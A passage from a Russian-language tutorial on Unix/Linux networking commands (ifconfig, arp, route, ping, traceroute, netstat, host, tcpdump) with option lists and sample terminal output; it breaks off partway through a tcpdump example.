						&lt;p&gt;&amp;#160; &amp;#160; Иначе команда конфигурирует указанный интерфейс. Изменить настройки какого-либо интерфейса может только суперпользователь.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Опции:&lt;br /&gt;&amp;#160; &amp;#160; интерфейс 	 – имя интерфейса (например, rl0 в BSD или eth0 в Linux).&lt;br /&gt;&amp;#160; &amp;#160; up 	 – вызывает активизацию интерфейса. Задается неявно при присвоении адреса интерфейсу.&lt;br /&gt;&amp;#160; &amp;#160; down 	 – вызывает остановку работы драйвера для интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; [-]arp 	 – включает или отключает использование протокола ARP для интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; [-]promisc 	 – включает или отключает неразборчивый режим (promiscuous mode) работы интерфейса. В этом режиме все проходящие по сети пакеты будут приниматься интерфейсом.&lt;br /&gt;&amp;#160; &amp;#160; [-]allmulti 	 – включает или отключает режим all-multicast. В этом режиме все многоадресные (multicast) пакеты в сети будут приниматься интерфейсом.&lt;br /&gt;&amp;#160; &amp;#160; metric N 	 – устанавливает метрику интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; mtu N 	 – устанавливает максимальный размер пакета (Maximum Transfer Unit - MTU) для интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; адрес 	 – IP-адрес, присваиваемый интерфейсу.&lt;br /&gt;&amp;#160; &amp;#160; netmask адрес 	 – устанавливает маску сети IP для этого интерфейса. По умолчанию используется обычная маска сети класса A, B или C (что определяется по IP-адресу интерфейса), но можно усановить любое значение.&lt;br /&gt;&amp;#160; &amp;#160; add адрес/длина_префикса 	 – добавляет адрес IPv6 для интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; del адрес/длина_префикса 	 – удаляет адрес IPv6 для интерфейса.&lt;br /&gt;&amp;#160; &amp;#160; irq адрес 	 – устанавливает аппаратное прерывание, используемое устройством. Не для всех устройств можно динамически менять значение IRQ.&lt;br /&gt;&amp;#160; &amp;#160; media тип 	 – устанавливает физический порт или тип носителя, используемый устройством. Не для всех устройств можно менять этот параметр, и для разных устройств могут поддерживаться различные значения. Типичные значения типа - 10base2 (коаксиальный кабель Ethernet), 10baseT (витая пара Ethernet 10 Мбит/сек), AUI (внешний передатчик) и т.д. Специальный тип носителя auto можно использовать, чтобы потребовать от драйвера автоматически обпределять тип носителя. Не все драйверы могут это делать.&lt;br /&gt;&amp;#160; &amp;#160; [-]broadcast [адрес] 	 – если указан аргумент адрес, задает соответствующий протоколу широковещательный адрес для интерфейса. В противном случае устанавливает (или сбрасывает) флаг IFF_BROADCAST для интерфейса.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример. изменение IP-адреса интерфейса rl0:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop ~ $ ifconfig rl0&lt;br /&gt;&amp;#160; &amp;#160; rl0: flags=8843&amp;lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&amp;gt; mtu 1500&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;options=8&amp;lt;VLAN_MTU&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet 192.168.19.86 netmask 0xffffff00 broadcast 192.168.19.255&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;ether 00:50:22:bb:05:f1&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;media: Ethernet autoselect (100baseTX &amp;lt;full-duplex&amp;gt;)&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;status: active&lt;br /&gt;&amp;#160; &amp;#160; user@desktop ~ $ ifconfig rl0 192.168.0.1&lt;br /&gt;&amp;#160; &amp;#160; user@desktop ~ $ ifconfig rl0&lt;br /&gt;&amp;#160; &amp;#160; rl0: flags=8843&amp;lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&amp;gt; mtu 1500&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;options=8&amp;lt;VLAN_MTU&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet6 fe80::250:22ff:febb:5f1%rl0 prefixlen 64 scopeid 0x3&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.19.255&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;ether 00:50:22:bb:05:f1&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;media: Ethernet autoselect (100baseTX &amp;lt;full-duplex&amp;gt;)&lt;br /&gt;&amp;#160; &amp;#160; 	&amp;#160; &amp;#160;status: active&lt;/p&gt;
						&lt;p&gt;arp&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда arp отображает ARP-таблицу данного хоста. С помощью параметра -i можно специфицировать сетевой интерфейс, информация о котором интересует.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # arp -i eth0&lt;br /&gt;&amp;#160; &amp;#160; Address&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; HWtype&amp;#160; HWaddress&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Flags Mask&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Iface&lt;br /&gt;&amp;#160; &amp;#160; DIMON.mshome.net&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ether&amp;#160; &amp;#160;00:50:BF:12:8A:9E&amp;#160; &amp;#160;C&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;eth0&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Таблица с информацией о канальном уровне содержит связь IP- и MAC-адресов. При использовании параметра -n IP-адреса не будут заменяться символьными именами хостов.&lt;br /&gt;route&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта команда используется для просмотра и изменения таблицы маршрутизации хоста. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример обычной таблицы маршрутизации для отдельного компьютера в сети:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # route -n&lt;br /&gt;&amp;#160; &amp;#160; Kernel IP routing table&lt;br /&gt;&amp;#160; &amp;#160; Destination&amp;#160; &amp;#160; &amp;#160;Gateway&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Genmask&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Flags Metric Ref&amp;#160; &amp;#160; Use Iface&lt;br /&gt;&amp;#160; &amp;#160; 192.168.5.0&amp;#160; &amp;#160; &amp;#160;0.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;255.255.255.0&amp;#160; &amp;#160;U&amp;#160; &amp;#160; &amp;#160;0&amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0 eth1&lt;br /&gt;&amp;#160; &amp;#160; 127.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160;0.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;255.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160;U&amp;#160; &amp;#160; &amp;#160;0&amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0 lo&lt;br /&gt;&amp;#160; &amp;#160; 0.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;192.168.5.254&amp;#160; &amp;#160;0.0.0.0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UG&amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0 eth1&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Особый интерес представляет адрес 0.0.0.0, который соответствует хосту назначения по умолчанию.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для добавление нового маршрута к определённому хосту используются параметры add и -host:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # route add -host 192.168.0.1 eth0&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта команда создаёт новую строку в таблице маршрутизации, согласно которой все пакеты к узлу 192.168.0.1 должны отправляться в сетевой интерфейс eth0.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Также можно добавлять шлюз для отправки пакетов в определённую сеть или к хосту:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # route add -net 192.168.1.0 gw 192.168.0.5&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Таким образом, все пакеты для сети 192.168.1.0 будут направляться на узел 192.168.0.5.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Аналогично, маршруты удаляются параметром del с указанием всей информации о маршруте:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # route del default gw 192.168.0.1&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Эта команда удаляет маршрут по умолчанию через хост 192.168.0.1.&lt;/p&gt;
						&lt;p&gt;Команды по диагностике сети&lt;/p&gt;
						&lt;p&gt;ping&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда используется для посылки пакетов ICMP ECHO_REQUEST сетевым хостам.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда ping имеет следующий синтаксис:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; ping [-AaDdfnoQqRrv] [-c число_пакетов] [-i секунд] [-l preload] [-M mask | time]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; [-m ttl] [-P policy] [-p pattern] [-S src_addr] [-s packetsize]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; [-t timeout] [-z tos] host&lt;br /&gt;&amp;#160; &amp;#160; ping [-AaDdfLnoQqRrv] [-c число_пакетов] [-I iface] [-i секунд] [-l preload]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; [-s packetsize] [-T ttl] [-t timeout] [-z tos] mcast-group&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда ping использует датаграмму ECHO_REQUEST протокола ICMP, чтобы вызвать ответ ICMP ECHO_RESPONSE указанного хоста или сетевого шлюза. Если хост отвечает, ping выдает сообщение, что хост включен (хост is alive), в стандартный выходной поток.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для проверки наличия хоста в сети достаточно ввести команду ping с аргументом - именем или адресом хоста:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop$ ping yandex.ru&lt;br /&gt;&amp;#160; &amp;#160; 64 bytes from 213.180.204.11: icmp_seq=0 ttl=48 time=5.659 ms&lt;br /&gt;&amp;#160; &amp;#160; 64 bytes from 213.180.204.11: icmp_seq=1 ttl=48 time=5.404 ms&lt;br /&gt;&amp;#160; &amp;#160; 64 bytes from 213.180.204.11: icmp_seq=2 ttl=48 time=4.889 ms&lt;br /&gt;&amp;#160; &amp;#160; ^C&lt;br /&gt;&amp;#160; &amp;#160; --- yandex.ru ping statistics ---&lt;br /&gt;&amp;#160; &amp;#160; 3 packets transmitted, 3 packets received, 0% packet loss&lt;br /&gt;&amp;#160; &amp;#160; round-trip min/avg/max/stddev = 4.889/5.317/5.659/0.320 ms&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для отправки определенного числа пакетов необходимо указать опцию -c число_пакетов. Для установки интервала между отправкой пакетов используется опция -i секунд.&lt;br /&gt;traceroute&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда traceroute служит для отладки сетевых соединений посредством построения маршрута следования пакетов к хосту назначения. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример следования пакетов до хоста ya.ru:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # traceroute ya.ru&lt;br /&gt;&amp;#160; &amp;#160; traceroute to ya.ru (213.180.204.8), 64 hops max, 40 byte packets&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;1&amp;#160; 195.91.230.65 (195.91.230.65)&amp;#160; 0.890 ms&amp;#160; 1.907 ms&amp;#160; 0.809 ms&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;2&amp;#160; cs7206.rinet.ru (195.54.192.28)&amp;#160; 0.895 ms&amp;#160; 0.769 ms&amp;#160; 0.605 ms&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;3&amp;#160; ix2-m9.yandex.net (193.232.244.93)&amp;#160; 1.855 ms&amp;#160; 1.519 ms&amp;#160; 2.95 ms&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;4&amp;#160; c3-vlan4.yandex.net (213.180.210.146)&amp;#160; 3.412 ms&amp;#160; 2.698 ms&amp;#160; 2.654 ms&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;5&amp;#160; ya.ru (213.180.204.8)&amp;#160; 2.336 ms&amp;#160; 2.612 ms&amp;#160; 3.482 ms&lt;/p&gt;
						&lt;p&gt;netstat&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда используется для показа состояния сети.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда netstat имеет следующий синтаксис:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; netstat [-AaLnSW] [-f protocol_family | -p protocol] [-M core] [-N system]&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда netstat показывает содержимое различных структур данных, связанных с сетью, в различных форматах в зависимости от указанных опций. Первая форма команды показывает список активных сокетов (sockets) для каждого протокола. Вторая форма выбирает одну из нескольких других сетевых структур данных. Третья форма показывает динамическую статистику пересылки пакетов по сконфигурированным сетевым интерфейсам; аргумент интервал задает, сколько секунд собирается информация между последовательными показами.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; -p имя_протокола Ограничить показ статистики или адресов управляющих блоков только протоколом с указанным именем_протокола, например, tcp.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Опции:&lt;br /&gt;&amp;#160; &amp;#160; -a 	 – показывать состояние всех сокетов; обычно сокеты, используемые серверными процессами, не показываются.&lt;br /&gt;&amp;#160; &amp;#160; -A 	 – показывать адреса любых управляющих блоков протокола, связанных с сокетами; используется для отладки.&lt;br /&gt;&amp;#160; &amp;#160; -i 	 – показывать состояние автоматически сконфигурированных (auto-configured) интерфейсов. Интерфейсы, статически сконфигурированные в системе, но не найденные во время загрузки, не показываются.&lt;br /&gt;&amp;#160; &amp;#160; -n 	 – показывать сетевые адреса как числа. netstat обычно показывает адреса как символы. Эту опцию можно использовать с любым форматом показа.&lt;br /&gt;&amp;#160; &amp;#160; -r 	 – показать таблицы маршрутизации. При использовании с опцией -s, показывает статистику маршрутизации.&lt;br /&gt;&amp;#160; &amp;#160; -s 	 – показать статистическую информацию по протоколам. При использовании с опцией -r, показывает статистику маршрутизации.&lt;br /&gt;&amp;#160; &amp;#160; -f семейство_адресов 	 – ограничить показ статистики или адресов управляющих блоков только указанным семейством_адресов, в качестве которого можно указывать:&lt;br /&gt;&amp;#160; &amp;#160; inet 	Для семейства адресов AF_INET&lt;br /&gt;&amp;#160; &amp;#160; unix 	Для семейства адресов AF_UNIX&lt;br /&gt;&amp;#160; &amp;#160; -I интерфейс 	 – выделить информацию об указанном интерфейсе в отдельный столбец; по умолчанию (для третьей формы команды) используется интерфейс с наибольшим объемом переданной информации с момента последней перезагрузки системы. В качестве интерфейса можно указывать любой из интерфейсов, перечисленных в файле конфигурации системы, например, emd1 или lo0.&lt;br /&gt;&amp;#160; &amp;#160; -p имя_протокола 	 –&amp;#160; Ограничить показ статистики или адресов управляющих блоков только протоколом с указанным именем_протокола, например, tcp.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример. показ таблицы маршрутизации:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop ~$ netstat -r&lt;br /&gt;&amp;#160; &amp;#160; Routing tables&amp;#160; &amp;#160;&amp;#160; &amp;#160;&lt;br /&gt;&amp;#160; &amp;#160; Internet:&lt;br /&gt;&amp;#160; &amp;#160; Destination&amp;#160; &amp;#160; &amp;#160; &amp;#160; Gateway&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Flags&amp;#160; &amp;#160; Refs&amp;#160; &amp;#160; &amp;#160; Use&amp;#160; Netif Expire&lt;br /&gt;&amp;#160; &amp;#160; default&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 19-101.local&amp;#160; &amp;#160; &amp;#160; &amp;#160;UGS&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0&amp;#160; 1373769&amp;#160; &amp;#160; rl0&lt;br /&gt;&amp;#160; &amp;#160; localhost&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; localhost&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; UH&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 1&amp;#160; &amp;#160; &amp;#160; 290&amp;#160; &amp;#160; lo0&lt;br /&gt;&amp;#160; &amp;#160; 192.168.0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; link#1&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; dc0&lt;br /&gt;&amp;#160; &amp;#160; 192.168.19&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;link#3&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; rl0&lt;br /&gt;&amp;#160; &amp;#160; 19-86.local&amp;#160; &amp;#160; &amp;#160; &amp;#160; localhost&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; UGHS&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; lo0&lt;br /&gt;&amp;#160; &amp;#160; 19-101.local&amp;#160; &amp;#160; &amp;#160; &amp;#160;00:0d:bc:e4:27:bf&amp;#160; UHLW&amp;#160; &amp;#160; &amp;#160; &amp;#160; 1&amp;#160; &amp;#160; &amp;#160; &amp;#160; 0&amp;#160; &amp;#160; rl0&amp;#160; &amp;#160; 116&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Internet6:&lt;br /&gt;&amp;#160; &amp;#160; Destination&amp;#160; &amp;#160; &amp;#160; &amp;#160; Gateway&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Flags&amp;#160; &amp;#160; &amp;#160; Netif Expire&lt;br /&gt;&amp;#160; &amp;#160; localhost.prov.ru&amp;#160; localhost.prov.ru&amp;#160; UH&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; lo0&lt;br /&gt;&amp;#160; &amp;#160; fe80::%dc0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;link#1&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; dc0&lt;br /&gt;&amp;#160; &amp;#160; fe80::2a0:ccff:fe3 00:a0:cc:3d:1f:bd&amp;#160; UHL&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;lo0&lt;br /&gt;&amp;#160; &amp;#160; fe80::%rl0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;link#3&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; rl0&lt;br /&gt;&amp;#160; &amp;#160; fe80::250:22ff:feb 00:50:22:bb:05:f1&amp;#160; UHL&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;lo0&lt;br /&gt;&amp;#160; &amp;#160; fe80::%lo0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;fe80::1%lo0&amp;#160; &amp;#160; &amp;#160; &amp;#160; U&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;lo0&lt;br /&gt;&amp;#160; &amp;#160; fe80::1%lo0&amp;#160; &amp;#160; &amp;#160; &amp;#160; link#5&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UHL&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;lo0&lt;br /&gt;&amp;#160; &amp;#160; ff01::&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;localhost.prov.ru&amp;#160; U&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;lo0&lt;br /&gt;&amp;#160; &amp;#160; ff02::%dc0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;link#1&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; dc0&lt;br /&gt;&amp;#160; &amp;#160; ff02::%rl0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;link#3&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; rl0&lt;br /&gt;&amp;#160; &amp;#160; ff02::%lo0&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;localhost.prov.ru&amp;#160; UC&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; lo0&lt;/p&gt;
						&lt;p&gt;host&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда host служит для получения доменной информации о хосте: IP-адрес, MX-записи и другой информации, связанной с данным символьным именем. Имя хоста указывается в качестве аргумента команды.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Пример работы команды:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop ~$ host yandex.ru&lt;br /&gt;&amp;#160; &amp;#160; yandex.ru has address 213.180.204.11&lt;br /&gt;&amp;#160; &amp;#160; yandex.ru mail is handled by 10 mx2.yandex.ru.&lt;br /&gt;&amp;#160; &amp;#160; yandex.ru mail is handled by 0 mx1.yandex.ru.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Вторым аргументом можно указать DNS-сервер, который будет использоваться при получении этой информации:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; user@desktop ~$ host yandex.ru ns1.aiya.ru&lt;br /&gt;&amp;#160; &amp;#160; Using domain server:&lt;br /&gt;&amp;#160; &amp;#160; Name: ns1.aiya.ru&lt;br /&gt;&amp;#160; &amp;#160; Address: 85.142.20.152#53&lt;br /&gt;&amp;#160; &amp;#160; Aliases:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; yandex.ru has address 213.180.204.11&lt;br /&gt;&amp;#160; &amp;#160; Using domain server:&lt;br /&gt;&amp;#160; &amp;#160; Name: ns1.aiya.ru&lt;br /&gt;&amp;#160; &amp;#160; Address: 85.142.20.152#53&lt;br /&gt;&amp;#160; &amp;#160; Aliases:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Using domain server:&lt;br /&gt;&amp;#160; &amp;#160; Name: ns1.aiya.ru&lt;br /&gt;&amp;#160; &amp;#160; Address: 85.142.20.152#53&lt;br /&gt;&amp;#160; &amp;#160; Aliases:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; yandex.ru mail is handled by 0 mx1.yandex.ru.&lt;br /&gt;&amp;#160; &amp;#160; yandex.ru mail is handled by 10 mx2.yandex.ru.&lt;/p&gt;
						&lt;p&gt;tcpdump&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда tcpdump используется для мониторинга сети на канальном и более высоких уровнях. Программа «слушает» на одним или нескольких сетевых интерфейсах и выводит дамп пакетов, проходящих через этот интерфейс.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Параметр -i задаёт имя сетевого интерфейса, на котором запускается прослушивание. При просмотре захватываемых данных удобно использовать ключ -l, который буферезует вывод построчно. Для этой команды также работает параметр -n, при использовании которого IP-адреса не будут заменяться символьными именами хостов. Пример работы команды:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # tcpdump -i eth0 -l -n&lt;br /&gt;&amp;#160; &amp;#160; tcpdump: verbose output suppressed, use -v or -vv for full protocol decode&lt;br /&gt;&amp;#160; &amp;#160; listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes&lt;br /&gt;&amp;#160; &amp;#160; 12:51:07.486755 arp who-has 0.0.0.0 (00:30:48:2b:6d:6a) tell 0.0.0.0&lt;br /&gt;&amp;#160; &amp;#160; 12:51:12.486606 arp who-has 0.0.0.0 (00:30:48:2b:6d:6a) tell 0.0.0.0&lt;br /&gt;&amp;#160; &amp;#160; 12:51:14.457608 IP 192.168.5.23.56385 &amp;gt; 194.91.250.11.443: P 3645922938:3645923156(218) ack 2092518729 win 10086&lt;br /&gt;&amp;#160; &amp;#160; 12:51:14.491343 IP 194.91.250.11.443 &amp;gt; 192.168.5.23.56385: . ack 218 win 10720&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Для вывода расширенной информации о пакетах исплюзуются ключи -v или -vv.&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # tcpdump -i eth1 -l -n -vv&lt;br /&gt;&amp;#160; &amp;#160; tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes&lt;br /&gt;&amp;#160; &amp;#160; 12:57:53.043797 IP (tos 0x0, ttl&amp;#160; 51, id 46031, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 286) 194.91.250.11.5190 &amp;gt; 192.168.5.23.38993: P 2517343058:2517343292(234)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; ack 2346573376 win 2202 &amp;lt;nop,nop,timestamp 2713588760 497668&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 12:57:53.043865 IP (tos 0x0, ttl&amp;#160; 64, id 52382, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 52) 192.168.5.23.38993 &amp;gt; 194.91.250.11.5190: ., cksum 0x1fd7 (correct),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; 1:1(0) ack 234 win 11945 &amp;lt;nop,nop,timestamp 506366 2713588760&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 12:57:53.401516 IP (tos 0x0, ttl&amp;#160; 48, id 45237, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 210) 194.91.250.11.443 &amp;gt; 192.168.5.23.56385: P 2092522043:2092522213(170)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; ack 3645927446 win 10720&lt;br /&gt;&amp;#160; &amp;#160; ...&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда tcpdump обладает очень богатым интерфейсом, включающем условные выражения, по которым должны выделяться интересующие пакеты. Например, можно использовать условия удалённого порта (равно 80):&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; desktop ~ # tcpdump -i eth1 -l -n -vv dst port 80&lt;br /&gt;&amp;#160; &amp;#160; tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes&lt;br /&gt;&amp;#160; &amp;#160; 13:55:36.563959 IP (tos 0x0, ttl&amp;#160; 64, id 3936, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 60) 192.168.5.23.52348 &amp;gt; 213.180.204.11.80: S, cksum 0x2766 (correct),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; 3855548287:3855548287(0) win 5840 &amp;lt;mss 1460,sackOK,timestamp 1372191 0,nop,wscale 2&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; 13:55:36.592654 IP (tos 0x0, ttl&amp;#160; 64, id 3937, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 40) 192.168.5.23.52348 &amp;gt; 213.180.204.11.80: ., cksum 0xebc5 (correct),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; 3855548288:3855548288(0) ack 3869420799 win 5840&lt;br /&gt;&amp;#160; &amp;#160; 13:55:36.592731 IP (tos 